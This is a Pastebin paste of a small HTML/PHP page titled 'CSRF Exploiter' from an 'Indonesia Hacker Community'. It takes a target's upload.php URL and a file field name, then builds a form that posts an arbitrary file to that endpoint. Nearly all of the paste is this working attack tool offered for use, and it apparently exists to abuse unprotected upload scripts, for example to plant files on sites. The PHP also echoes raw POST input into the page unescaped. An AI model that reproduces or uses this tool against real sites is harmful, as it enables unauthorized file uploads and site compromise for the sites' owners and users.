Advertisement
jefrialdi33

Csrf online

Dec 16th, 2018
548
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.47 KB | None | 0 0
  1. <html>
  2. <body bgcolor="black">
  3. <style>
  4. *{
  5. margin-top:0px;
  6. }
  7. body{
  8. background-position: center;
  9. background-color:#000000;
  10. height:150%;
  11. width:110%;
  12. background-attachment: fixed;
  13. background-size:150% 100%;
  14. background-image:url(' ');
  15.  
  16. }
  17.  
  18. </style>
  19. <link href="" rel="stylesheet" type="text/css"> <meta property="og:image" content="http://i65.tinypic.com/52w48.jpg">
  20. <title>Csrf Exploiter</title>
  21. <center><font color="red">
  22. <h1>CSRF EXPLOITER</h1></center>
  23. <center>
  24. <img src="http://i63.tinypic.com/s681on.jpg" border="0"width="550px" height="200px">
  25. </center>
  26. <center><font color="red"><form method="post">
  27. Domain: <input type="text" name="url" size="50" height="10" placeholder="http://www.target.com/[path]/upload.php" style="margin: 5px auto; padding-left: 5px;" required><br>
  28. POST File: <input type="text" name="pf" size="50" height="10" placeholder="Filedata / files[] / qqfile / userfile / dll" style="margin: 5px auto; padding-left: 5px;" required><br>
  29. <input type="submit" name="d" value="Kunci Domain">
  30. </form>
  31. <?php
  32. $url = $_POST['url'];
  33. $pf = $_POST['pf'];
  34. $d = $_POST['d'];
  35. if($d) {
  36. echo "<form method='post' target='_blank' action='$url' enctype='multipart/form-data'><input type='file' name='$pf'><input type='submit' name='g' value='Upload'></form";
  37. }
  38. ?>
  39. </form>
  40. </font>
  41. </center>
  42. <center> <font color='red' face='Shrikhand' size='3'>Copyright &copy; 2018 <font color='lime'>Indonesia Hacker Community</font></center>
  43. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement